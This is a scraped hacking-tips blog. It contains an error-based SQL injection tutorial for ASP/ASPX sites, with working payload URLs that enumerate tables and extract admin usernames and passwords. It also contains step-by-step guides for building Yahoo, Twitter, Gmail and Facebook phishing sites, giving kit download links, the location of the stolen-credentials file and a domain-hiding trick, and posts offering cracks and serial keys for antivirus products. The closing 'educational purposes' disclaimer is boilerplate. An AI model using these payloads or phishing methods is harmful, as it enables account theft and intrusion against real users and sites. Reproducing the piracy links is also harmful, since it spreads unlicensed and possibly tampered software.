Hacking ASP/ASPX Websites - SQL Injecto


Hacking ASP/ASPX sites
ASPX injection is also similar to PHP based sql injection. But here, we don't use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.



Step 1: Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx link which looks like
www.vulnerablesite.com/gallery.aspx?id=10
when i browse my actual link, i get the page as shown in the figure.


Step 2: Checking For Vulnerability

As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error similar to the following, then our site is vulnerable to sql injection.



In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column.  We will directly find out the table names,column names and then we will extract the data.


Step 3: Finding Out The Table Names.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))
The above code executes the second query and retrieves the first table name from the database. the windows server cant convert character value into data type. so we will get an error as shown in the following figure from which we can get the first table name.


But this may not be the desired table for us. So we need to find out the next table name in the database.

For that, we will use the following query.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name')))
replace the first_table_name with the actual table name we got above.



Now we will get the second table name as shown in the figure. Still if we don't get our desired table, we will continue the procedure until we get the  desired table name. Now the query looks like
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from  information_schema.tables where table_name not in ('first_table_name','second_table_name')))
Replace first_table_name and second_table_name with the table names we got in the above steps.



Step 4: Finding Out The Columns

Now we got the admin table. So we need to find out the columns now.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table'))

Replace admin_table with the table name we got. In our case, it is "vw_system_admin"



If the first column is not related to our desired column names, then follow the steps as we have done in step 3.
www.vulnerablesite.com/gallery.aspx?id=10  and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

Replace first_column_name with the column name we got.




Step 5:Extracting The Data

After finding out all the columns, we need to extract the data such as user names and passwords.

For that, we use the following query

For user name,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))



For password,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

Hope this info helped you, For further doubts and clarifications please pass your comments
Share:

Katana: Portable Multi-Boot Security Suite

 


Katana is a package that brings about 100 different Legends of hacking in just one pack. It is a amazing that all these Softwares are portable and you do not even need to download them. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal.









Katana Tool Kit:
  •  Metasploit
  • Wireshark
  • NMAP
  • John the Ripper
  • Cain & Abel
  • Firefox
  • PuTTY
  • the Unstoppable Copier
  • OllyDBG
  • Cygwin
  • ClamAV
  • IECookiesView
  • MozillaCacheView
  • FreeOTFE
  • FindSSN
  • The Sleuth Kit
  • OpenOffice
Share:

Insert your friends picture in Facebook Chat.

Recently I was informed by my very good friend of this great tricks in which you can add the picture of literrily anyone in the Facebook chat. First the trick only had :putnam: which would show a small face, but now there is something more cool in town ;)

TUTORIAL:

Step 1: Goto the Profile of the User or Page whose picture, you want to add.

Step 2: Copy the Username or Profile ID from the page. Ex: https://www.facebook.com/pages/Hot-Tech-Tips/147390308674525?sk=wall or http://www.facebook.com/profile.php?id=0000000000

Step 3: Now Goto the Chat and paste this username or profile ID inside square Brackets Ex: [[hottechtips]]

                                       

Step 4: Now press Enter and the Profile picture of that user or page will go to other person.


Hope you liked this Trick, for long lasting fun subscribe or like my FB page https://www.facebook.com/pages/Hot-Tech-Tips/147390308674525?sk=wall
Share:

Where is telnet in Windows 7 ?

Recently I was playing with command prompt and noticed that Telnet Client is not enabled in Windows 7, So i decided to write this small Tut to tell you how to enable it.

Step 1: Click on Start Button.

Step 2: Goto Control Panel.

Step 3: Now Goto Programmes and features.

Step 4: Now open Turn Windows Features on and off

Step 5: Here enable the telnet client.
Share:

BitDefender Total Security 2012 [Crack] [Free] [Final]

Image

BitDefender Total Security 2012 Build 15.0.34.1416 Final | 460MB

BitDefenderTotal Security 2012 - comprehensive protection against viruses,spyware, hacker attacks and other cyber threats that could lead toidentity theft, data loss and decreased performance. BitDefender TotalSecurity is the first among its competitors due to effective protectionagainst spam and viruses, robust firewalling and the availability oftools to optimize and backup systems in one package.
BitDefenderTotal Security 2012 provides a special kind of quiet protection regimeAutopilot: no pop-ups, no settings, does not interrupt your activityon the computer.

Antivirus, antispyware, anti-phishing, firewall -firewall, parental controls, integrated, safe social networking, remotecontrol functions. Total Security includes functions - file encryption,data backup, configure, and optimize the system.
The main components of BitDefender Total Security 2012
• Antivirus and antispyware
• Phishing
• Secure Search
• A quick scan
• Control your home network
• Encrypt chats
• Privacy in social networks
• Antsipam
• Firewall
• Parental Control
• Encryption of files
• Optimization of
• Destruction of files
• Online backup (2GB)
New in BitDefender Total Security 2012
• Autopilot
Autopilot mode provides optimum security without user intervention. That means - no pop-ups and alerts do not need to configure anything.
• Scan Manager
Scan Manager finds and uses the time intervals when the system utilization is below a certain threshold, perform repetitive inspections for your entire system. Thus, BitDefender does not interfere with user tasks and has no effect on system performance.
• Recovery Mode
If Internet-based threats such as rootkits, can not be removed as part of Windows, your computer downloads in recovery mode a trusted environment that is used for cleaning and restoration.
• Integrated cloud services
The global exchange of data in real time between the servers and BitDefender BitDefender 2012 products ensures rapid identification of emerging internet threats such as epidemics and large flows of spam.
• Synchronize the files
BitDefender Total Security 2012 offers space Safebox, which allows you to synchronize files between your computers (for example, between your desktop and laptop). Changes made in one system are automatically applied to other systems.
• Online Backup
Updated online backup monitor tracks the status of your important files and copies them instantly to a secure remote server. BitDefender Total Security 2012 comes with 2GB of online storage.
• Safety on social networks
Has a function to prevent Internet threats specific to social networks, by scanning the references received from friends from Facebook and Twitter, by controlling the privacy settings and much more.
• Customizable interface
Drag-and-drop modules that allow you to access the most frequently performed operations directly from the main window.
• Simplified installation
BitDefender Total Security 2012 is installed in a few clicks, taking up half the time required for the previous version.
On the file:
Language: English
File format: rar
Platform / OS: XP, Vista, 7 



DOWNLOAD:

BITDEFENDER TOTAL SECURITY 2012 (32 Bit = 228 MB)
http://download.bitdefender.com/windows/desktop/t_security/2012/en-us/bitdefender_ts_2012_32b.exe


BITDEFENDER TOTAL SECURITY 2012 (64 Bit = 248 MB)
http://download.bitdefender.com/windows/desktop/t_security/2012/en-us/bitdefender_ts_2012_64b.exe
PATCH:

http://www.fileserve.com/file/QKv72jj

http://rapidshare.com/files/457094837/Box_BD2011_3.1.rar

http://www.wupload.com/file/7800553/Box_BD2011_3.1.rar
Share:

Avira Antivirus Premium 2012 12.0.0.865 [Final] [Crack] [Serial Key]

Image 



Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection:
Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates it offers premium protection. It includes a POP3 based MailScanner that scans emails before they are stored on your machine. With a user-friendly control center, quarantine management, fast performance and world leading detection rates the Avira AntiVir Premium provides essential protection for your PC.

AntiVir Personal offers effective protection against computer viruses for the individual and private use on a single PC-workstation. It detects and removes viruses and includes an Internet-Update Wizard for easy updating.


Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!
Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called "H+BEDV Datentechnik GmbH" when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium.

Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite
 


Serials Works Till 21.1.2012 (Will Update It) 

Image 



Operating systems : 


Works On 32bit/64bit 


Download Links : 


Avira Antivirus Premium



http://premium.avira-update.com/package/wks_avira/win32/en/pepr/avira_antivirus_premium_en.exe


Serial Keys:


http://rapidshare.com/files/2339055374/Avira_New_Keys.rar




INSTRUCTIONS:


Download the Avira Premium Antivirus 2012 from there official site and open it. While installing where it ask for key upload the Any of the Avira Key that you have downloaded from here . And just let is install BUT REMEMBER TURN OFF YOUR INTERNET OTHER WISE IT WONT WORK!
Share:

Watch Start Wars on telnet.

This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.


       1. Go to start > Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.



       3. After that enter o as shown below and press enter.


       4. Next enter towel.blinkenlights.nl as shown below and press enter.

       5. Now star wars movie will start playing on your command prompt.


via: http://www.learntricks.in/2012/01/watch-star-wars-movie-in-cmd.htm
Share:

Anonymous Changes DDoS Tactics in Megaupload Retaliation

Anonymous' army of hacktivists have changed tactics in what some are calling an attempt to trick people into participating in distributed denial-of-service (DDoS) attacks.
A round of DDoS attacks Thursday were launched in retaliation for the federal crackdown on Megaupload, a popular file-sharing site sometimes used to distribute pirated material. Law enforcement officials from the United States and other countries moved against a number of people Thursday that were named in an indictment returned earlier this month in federal court in Virginia. The indictment names seven men and two corporations – Megaupload Limited and Vestor Limited – and accuses them of engaging in a racketeering conspiracy, conspiring to commit copyright infringement, conspiring to commit money laundering and two substantive counts of criminal copyright infringement.
In response to the crackdown, Anonymous launched attacks against websites belonging to the U.S. Department of Justice, FBI, Recording Industry Association of America and others.


“In the past, Anonymous has encouraged supporters to install a program called LOIC (Low Orbit Ion Cannon) which allows computers to join in an attack on a particular website, blasting it with unwanted traffic,” Sophos Senior Technology Consultant Graham Cluley noted in a blog post. “This time, things are slightly different: you only have to click on a web link to launch a DDoS attack.”
According to Cluley, members of Anonymous used Twitter to post links that, when clicked, automatically made people part of an attack.
“We've seen many links posted on Twitter, and no doubt elsewhere on the internet, pointing to a page on the pastehtml.com website,” he explained. “If you visit the webpage, and do not have JavaScript disabled, you will instantly, without user interaction, begin to flood a website of Anonymous's choice with unwanted traffic, helping to perpetuate a DDoS attack.”
Cluley argued the change in tactics might be because it could allow anyone prosecuted to claim they were unknowing participants. In late 2010 and throughout 2011, several hacktivists associated with Anonymous were arrested around the world.
"Don't forget, denial-of-service attacks are illegal,” he wrote. “If you participate in such an attack you could find yourself receiving a lengthy jail sentences.”
Commenting on this Article will be automatically closed on April 21, 2012.
Share:

ESET NOD32 Antivirus 5 [Full] [Free] [Crack]

Image

Built on the award-winning ThreatSense engine, ESET NOD32 Antivirus proactively detects and disables more viruses, trojans, worms, adware, spyware, phishing, rootkits and other Internet threats than any program available.ESET NOD32 Antivirus provides: Proactive Protection: The award winning ThreatSense technology combines multiple layers of detection protecting you from Internet threats before it is too late.Precise Detection: ESET accurately identifies known and unknown threats. It consistently wins top awards from testing labs and is recognized for having zero false positives.1Lightweight Design: Requires less memory and CPU power, allowing your computer to run fast, making more room for games, web browsing, and emailing.Fast Scanning Speeds: Highly efficient program ensuring fast file scanning and product updates. It runs quietly in the background.Proactive, precise, lightweight and fast. You wont find a better antivirus program. 

DOWNLAOD:>


http://www.megaupload.com/?d=7B83RSMM

http://bc.vc/PDIfZ
Share:

Norton Internet Security 2012 + Antivirus [Lifetime licence] [Full] [Crack]

Image
Key Technologies: 
• Anti Virus 
• Anti Rootkit 
• Bot Protection 
• Norton™ Safe Web 
• Smart Firewall 
• NEW! SONAR™ 2 Behavioral Protection 
• NEW! Norton System Insight 
• NEW! Norton Insight Network AntiSpam 
• NEW! Norton Download Insight 
• NEW! Norton Threat Insight 
• Spyware Protection 
• Identity Protection 
• Pulse Updates 
• Network Monitoring 
• Parental Controls 
• Vulnerability Protection 
• NEW! Professional Strength AntiSpam 
• NEW! Norton File Insight 

Key Benefits: 
• NEW Delivers clear threat and performance explanations—Gives you greater insight into downloaded applications and files by telling you where they came from, if they can be trusted, and how they may impact your PC’s resources and performance. 
• NEW Identifies unsafe web sites right in your search results—Warns you of dangerous web sites and suspicious sellers so you can surf and shop online with confidence. 
• IMPROVED! Stops online identity theft, viruses, spyware, bots and more—Guards your PC, online activities, and your identity against all types of Internet threats. 
• IMPROVED! Stops attacks before they get on your PC—Proactively blocks hackers and prevents dangerous software from downloading to your computer when you surf the web. 
• Uses intelligence-driven Norton Insight Network for faster, fewer, shorter scans—Detects and eliminates dangerous software with the shortest scan times of any security product. 

Norton Internet Security + Norton Antivirus + Crack 

Download links: 


http://www.fileserve.com/file/7YevqYD/Norton.IS.AV.2012.19.part1.rar 
http://www.fileserve.com/file/dEgNtVk/Norton.IS.AV.2012.19.part2.rar
Share:

Making Yahoo Phishing Site Tutorial

Hack Yahoo Accounts.

Ok friend Today I am going to show you How to Make the Yahoo! Phishing Site, with which you can easily Hack your friends and fellows, just you have to copy the following Steps.


Step 1: The First Step in Making the site is to regester an account at http://www.p4o.net/signup.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE http://bc.vc/ROT0C ) .

Step 4: Now Goto http://www.p4o.net/login.php and Log into your account.

Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.txt



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO Yahoo.zip is http://www.mediafire.com/?jawqf7dyg0iwn3x
Share:

Making Twitter Phishing Site Tutorial

Hack Twitter Tutorial.
Yah! Today is turn of Twitter. I am going to show you how to make the Twitter Phishing site, with which you can Hack any Twitter account ;)


Step 1: The First Step in Making the site is to regester an account at http://www.p4o.net/signup.php (if you have account than you can skip first 2 steps)




Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE http://bc.vc/JC46Q ) .


Step 4: Now Goto http://www.p4o.net/login.php and Log into your account.


Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.txt



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO twitter.zip is http://www.mediafire.com/?dxpzo20d0fw2n8a
Share:

How to Hack Gmail account using Phishing.



Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE (http://www.filesonic.com/file/4165336855/Gmail-Phishing-site.zip ) .


Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

Step 6: Now Click on the Public_html.


Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.


Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO Gmail-phishing-site.zip is http://www.filesonic.com/file/4165336855/Gmail-Phishing-site.zip
Share:

Making Facebook Phishing Site Tutorial.




Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE (http://www.filesonic.pk/file/4163700355/Facebook-Phishing-Site.zip ) .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.


Step 6: Now Click on the Public_html.



Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html


If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://www.filesonic.pk/file/4163700355/Facebook-Phishing-Site.zip
PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it
Share:

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.